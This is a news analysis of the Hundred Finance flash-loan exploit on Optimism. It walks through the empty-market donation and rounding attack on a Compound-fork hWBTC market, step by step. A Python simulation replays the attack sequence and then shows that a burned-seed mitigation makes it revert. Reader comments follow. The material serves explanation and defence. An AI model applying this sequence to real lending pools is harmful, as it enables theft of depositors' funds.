
Hundred Finance Suffers $7 Million Flash Loan Exploit on Optimism Network

The decentralized lending protocol Hundred Finance fell victim to a sophisticated flash loan attack on April 15, 2023, resulting in the loss of approximately $7 million worth of digital assets on the Optimism layer-2 blockchain. The breach underscores the persistent vulnerabilities that continue to challenge DeFi platforms, even those built on battle-tested codebases.

The Exploit Mechanics

The attack commenced at 14:12 UTC when the attacker initiated a flash loan through Aave, borrowing 500 WBTC (Wrapped Bitcoin). With Bitcoin trading at approximately $30,318 at the time, this represented a substantial borrowing position. The attacker exploited a critical vulnerability in Hundred Finance’s hWBTC token contract, which had minimal existing lending activity.

The attacker first redeemed their previously deposited WBTC, bringing the total supply of hWBTC to zero. They then deployed a minimal proxy contract and deposited 4 WBTC through it, receiving 200 hWBTC (the market's initial exchange rate of 0.02 WBTC per hWBTC, the Compound default). By redeeming until only 2 wei of hWBTC remained, the attacker left a market whose entire supply was two units under their control, which set the stage for the exchange-rate manipulation that followed.

The attacker then transferred the 500 WBTC from the flash loan directly to the hWBTC contract rather than minting with it. Because the exchange rate is computed as the contract's underlying balance divided by total supply, 500 WBTC sitting against a supply of 2 wei valued each wei of hWBTC at roughly 250 WBTC. This inflated collateral value allowed the attacker to borrow a significant amount of ETH, valued at approximately $2,092 per token on that date.

A critical factor was the arithmetic in the contract, compiled with Solidity 0.5.16 and using Compound's checked fixed-point math library to prevent integer overflow. The overflow checks were not the problem; the truncating integer division in the exchange-rate math was. Converting a withdrawal of 500 WBTC into the number of hWBTC to burn (amount × 1e18 / exchangeRate) rounds down, so at an exchange rate of about 250 WBTC per wei the withdrawal burned only 1 wei of hWBTC instead of the 1.99 wei the real ratio called for, while the liquidity check still valued the 1 wei left behind at the inflated rate. That let the attacker pull out far more value than their actual collateral position justified.

Affected Systems

The exploit specifically targeted Hundred Finance’s deployment on the Optimism network, a layer-2 scaling solution for Ethereum. The protocol, which is a fork of Compound’s lending codebase, operated across multiple chains but the vulnerability was most acute on the Optimism deployment where hWBTC had limited lending activity.

Multiple lending pools were drained in the attack sequence. After the initial hWBTC exploit, the attacker repeated the process against other token markets, compounding the total losses. The precondition was a near-empty market: with no other suppliers or borrowers in hWBTC, the attacker could drive total supply down to the 2 wei they controlled.

The attack did not affect Hundred Finance’s deployments on other networks, highlighting how identical code can exhibit different risk profiles depending on the liquidity conditions and usage patterns on each chain.

The Mitigation Strategy

Following the exploit, Hundred Finance acknowledged the hack publicly and stated they were in discussions with multiple security teams to investigate the incident. The team attempted to establish communication with the attacker, expressing hope for a mutually agreeable resolution.

They also requested that affected users based in the United States, particularly in New York, reach out through direct messages on social media or via Discord to coordinate potential recovery efforts. The team advised against speculation about the attack methodology while they prepared a comprehensive post-mortem report.

For the broader DeFi ecosystem, the attack highlights several mitigation strategies. Protocols should enforce minimum liquidity in lending pools so the total supply of hTokens can never be driven to a handful of wei; the usual way to do this on Compound-style markets is to mint an initial amount of hTokens at deployment and send them to a burn address, so the supply floor is permanent and any donated underlying is shared with the burned seed rather than concentrated in an attacker's few wei. Note that upgrading the Solidity version does not address the root cause: the checked arithmetic in Solidity 0.8 prevents overflow but still truncates integer division, so the rounding that made 500 WBTC redeemable for 1 wei of hWBTC survives a compiler upgrade unchanged.
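The following Python model, added here as an illustration and not code from Hundred Finance or Compound, replays the sequence described under The Exploit Mechanics with the integer arithmetic a Compound-style hToken uses (exchange rate = cash × 1e18 / totalSupply, truncating division on mint and redeem, a redeem liquidity check that values what remains at the pre-redeem rate), and then reruns it against a market seeded with burned hTokens as recommended above. The collateral factor of 0.75, the 0.02 WBTC seed and the burn address are assumptions for the example; all amounts are base units (satoshi for WBTC, 1e-8 for hWBTC), and every figure comes from the model, not from chain data.

```python
"""Compound-style hToken market in integer arithmetic: empty-market donation
attack plus the burned-seed mitigation. Constructed example, not protocol code."""

MANTISSA = 10**18            # fixed-point scale used by Compound's math library
INITIAL_RATE = 2 * 10**16    # 0.02 underlying per hToken: 4 WBTC mints 200 hWBTC
CF = 75 * 10**16             # collateral factor 0.75 (ASSUMED, not from the article)
BURN = "0xdead"              # hypothetical burn address for the seed supply


class Undercollateralized(Exception):
    pass


class Market:
    def __init__(self):
        self.cash = 0            # underlying held by the contract
        self.total_supply = 0    # hTokens outstanding
        self.balances = {}       # hToken balances
        self.debt = {}           # borrows, in WBTC-equivalent base units

    def exchange_rate(self):
        # exchangeRateStored(): (cash + borrows - reserves) * 1e18 / totalSupply.
        # No borrows or reserves in this scenario; donated cash counts in full.
        if self.total_supply == 0:
            return INITIAL_RATE
        return self.cash * MANTISSA // self.total_supply

    def collateral_value(self, who):
        return self.balances.get(who, 0) * self.exchange_rate() // MANTISSA

    def mint(self, who, amount):
        tokens = amount * MANTISSA // self.exchange_rate()     # truncates
        self.cash += amount
        self.total_supply += tokens
        self.balances[who] = self.balances.get(who, 0) + tokens
        return tokens

    def donate(self, amount):
        # Plain ERC-20 transfer into the contract: cash rises, supply does not.
        self.cash += amount

    def borrow(self, who, amount):
        if self.debt.get(who, 0) + amount > self.collateral_value(who) * CF // MANTISSA:
            raise Undercollateralized("borrow")
        self.debt[who] = self.debt.get(who, 0) + amount

    def _redeem_allowed(self, who, tokens, rate):
        # redeemAllowed(): what stays is valued as (balance - tokens) * rate, using
        # the pre-redeem rate and the token count, not the cash actually leaving.
        if tokens > self.balances.get(who, 0):
            raise Undercollateralized("insufficient hTokens")
        remaining = (self.balances[who] - tokens) * rate // MANTISSA
        if self.debt.get(who, 0) > remaining * CF // MANTISSA:
            raise Undercollateralized("redeem")

    def _settle(self, who, tokens, amount):
        self.balances[who] -= tokens
        self.total_supply -= tokens
        self.cash -= amount

    def redeem_tokens(self, who, tokens):
        rate = self.exchange_rate()
        amount = tokens * rate // MANTISSA                      # truncates
        self._redeem_allowed(who, tokens, rate)
        self._settle(who, tokens, amount)
        return amount

    def redeem_underlying(self, who, amount):
        rate = self.exchange_rate()
        tokens = amount * MANTISSA // rate                      # truncates: the bug
        self._redeem_allowed(who, tokens, rate)
        self._settle(who, tokens, amount)
        return tokens


def run_attack(seed_underlying=0):
    """Replay the article's sequence. seed_underlying > 0 bootstraps the market
    with hTokens sent to BURN before the attacker acts (the mitigation)."""
    m, atk = Market(), "attacker"
    if seed_underlying:
        m.mint(BURN, seed_underlying)
    minted = m.mint(atk, 4 * 10**8)                 # 4 WBTC -> 200 hWBTC
    m.redeem_tokens(atk, minted - 2)                # leave exactly 2 wei of hWBTC
    m.donate(500 * 10**8)                           # flash-loaned 500 WBTC, sent straight in
    inflated = m.collateral_value(atk)
    rate = m.exchange_rate()
    tokens_for_500 = 500 * 10**8 * MANTISSA // rate
    burned = None
    if tokens_for_500 <= m.balances[atk]:
        # Size the borrow so the redeem's liquidity check still passes: it credits
        # the 1 wei left over with 1 * rate (about 250 WBTC), not the 1 sat really left.
        survivable = (m.balances[atk] - tokens_for_500) * rate // MANTISSA * CF // MANTISSA
        m.borrow(atk, survivable)
        burned = m.redeem_underlying(atk, 500 * 10**8)   # repays the flash loan
    return {"minted": minted, "inflated_collateral": inflated,
            "tokens_burned_for_500_wbtc": burned, "attacker_debt": m.debt.get(atk, 0),
            "cash_left": m.cash, "attacker_hwbtc_left": m.balances[atk],
            "collateral_after": m.collateral_value(atk)}


def usd(sats, btc_price=30318):
    """WBTC-equivalent base units to dollars at the article's BTC price."""
    return sats * btc_price // 10**8


if __name__ == "__main__":
    for seed in (0, 2_000_000):   # unseeded, then seeded with 0.02 WBTC of burned hWBTC
        r = run_attack(seed)
        print(f"seed={seed}: {r}, bad debt ~${usd(r['attacker_debt']):,}")
```

In the unseeded run the model's 2 wei are valued at 500.00000001 WBTC after the donation, the 500 WBTC withdrawal burns a single wei, and the attacker walks away owing 187.5 WBTC-equivalent (about $5.7M at the article's price) against 1 satoshi of real collateral; the article's $7M figure is the sum over the other markets hit the same way. With 0.02 WBTC of burned seed in place, the same donation leaves the attacker's 2 wei worth 1,000 satoshi, the withdrawal would need about 100 million wei of hWBTC the attacker does not hold, and the transaction reverts with the donation stranded in the pool.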

Lessons Learned

The Hundred Finance exploit reinforces several critical lessons for DeFi protocols. First, forking established codebases like Compound does not automatically confer security. The same code can behave differently under different liquidity conditions, and protocols must account for edge cases where token supplies approach zero.

Second, flash loan attacks remain one of the most potent threat vectors in DeFi. The ability to borrow massive amounts of capital without collateral, even momentarily, creates opportunities for price manipulation that can cascade across interconnected protocols.

Third, rounding in smart contracts can have outsized consequences. Burning 1 wei instead of the 1.99 wei the exact ratio called for looks negligible, but when each wei of hWBTC is valued at hundreds of WBTC, that truncation is the gap through which millions of dollars left the protocol.

User Action Required

Users who had funds deposited in Hundred Finance’s Optimism deployment should monitor official communication channels for updates on recovery efforts. As a general precaution, users should evaluate whether their funds are spread across multiple protocols to reduce exposure to single-point failures. When interacting with lending protocols, it is advisable to check the liquidity depth and usage statistics of the markets you participate in, as low-liquidity pools present elevated risk profiles. Always verify that protocols you use have undergone recent security audits and maintain active bug bounty programs.

Disclaimer: This article is for informational purposes only and does not constitute financial advice. Always conduct your own research before engaging with any DeFi protocol.


9 thoughts on “Hundred Finance Suffers $7 Million Flash Loan Exploit on Optimism Network”

  1. manipulating hWBTC price by draining supply to 2 wei. classic empty pool exploit. this pattern keeps repeating across lending protocols

    1. flashloan_cop calling it classic empty pool exploit. compound forks keep getting hit with this exact pattern and nobody learns

  2. another day another compound fork drained. the 2 wei of hWBTC remaining to manipulate the exchange rate is such a tiny precision detail

    1. rekt_researcher

      2 wei remaining to manipulate the exchange rate. the precision required here is insane, layer2_watch was right about the code reading

  3. the attack started at 14:12 UTC and was probably planned for weeks. these aren't script kiddies, they're studying the code more carefully than the devs

  4. 500 WBTC flash loan from Aave used to attack a protocol on Optimism. the composability that makes DeFi powerful also makes it fragile

  5. creating a minimal proxy contract just to deposit 4 WBTC and receive 200 hWBTC. the attacker understood the token math better than the protocol team

    1. ^ that's the scary part. it's not that the exploit was novel. it's that someone sat down and read every line of that forked compound code looking for edge cases

  6. every week another fork of compound or aave gets drained. when do we stop forking and start building from scratch
